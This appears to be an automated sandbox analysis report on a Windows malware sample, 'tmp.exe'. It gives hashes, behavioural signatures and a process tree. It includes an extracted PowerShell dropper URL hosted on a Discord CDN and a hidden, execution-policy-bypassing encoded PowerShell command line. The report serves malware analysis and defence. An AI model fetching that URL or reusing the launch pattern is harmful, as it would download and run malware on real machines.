Analysis
- max time kernel: 31s
- max time network: 33s
- platform: windows7_x64
- resource: win7-20230220-en
- resource tags: arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
- submitted: 28-03-2023 12:12
Static task: static1

Behavioral task: behavioral1
- Sample: tmp.exe
- Resource: win7-20230220-en (windows7-x64)
- 4 signatures, 150 seconds

Behavioral task: behavioral2
- Sample: tmp.exe
- Resource: win10v2004-20230220-en (windows10-2004-x64)
- 6 signatures, 150 seconds
General
- Target: tmp.exe
- Size: 92KB
- MD5: f0b2f2d5186ecb1df278892375e29171
- SHA1: f1e2e1365ad3463a5685bd6ab8eeb581f50dd0ee
- SHA256: 03ac65cbbc897a705cfa15c74bba1adc773f88db724398db12d105d19ee8ee50
- SHA512: 41fa116f39afd6f4e7fc7bad821c0ce9fe0db268dab18a9e83db6ec3fe6c83099bf14f80441f0bf87a4d5590782a1ba9908d6c576d8c56e224a8c096aae07c0d
- SSDEEP: 1536:EjpxRYrm0MlPJFZyMzJdNHJGQ/l3pS+2ZyxDG/ONJctGVaIsWkBcd5ApB:EjF0M9bldNrpS+2ZyxDG//UVb58B
- Score: 10/10
Malware Config
Extracted
- Language: ps1
- Deobfuscated
- URLs (ps1.dropper): https://cdn.discordapp.com/attachments/1089906964944920650/1090020680885600276/6456234.ps1
Signatures
- Blocklisted process makes network request (2 IoCs)
  Processes: powershell.exe
  flow  pid   process
  4     1684  powershell.exe
  5     1684  powershell.exe
- Suspicious behavior: EnumeratesProcesses (1 IoC)
  Processes: powershell.exe
  pid   process
  1684  powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes: powershell.exe
  description              pid   process
  Token: SeDebugPrivilege  1684  powershell.exe
- Suspicious use of WriteProcessMemory (8 IoCs)
  Processes: tmp.exe, cmd.exe
  description                        pid   process   target process
  PID 1964 wrote to memory of 1936   1964  tmp.exe   cmd.exe
  PID 1964 wrote to memory of 1936   1964  tmp.exe   cmd.exe
  PID 1964 wrote to memory of 1936   1964  tmp.exe   cmd.exe
  PID 1964 wrote to memory of 1936   1964  tmp.exe   cmd.exe
  PID 1936 wrote to memory of 1684   1936  cmd.exe   powershell.exe
  PID 1936 wrote to memory of 1684   1936  cmd.exe   powershell.exe
  PID 1936 wrote to memory of 1684   1936  cmd.exe   powershell.exe
  PID 1936 wrote to memory of 1684   1936  cmd.exe   powershell.exe
Processes
- [1] C:\Users\Admin\AppData\Local\Temp\tmp.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
  PID: 1964
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -w hidden -enc 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
    PID: 1936
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -w hidden -enc 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
      PID: 1684
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken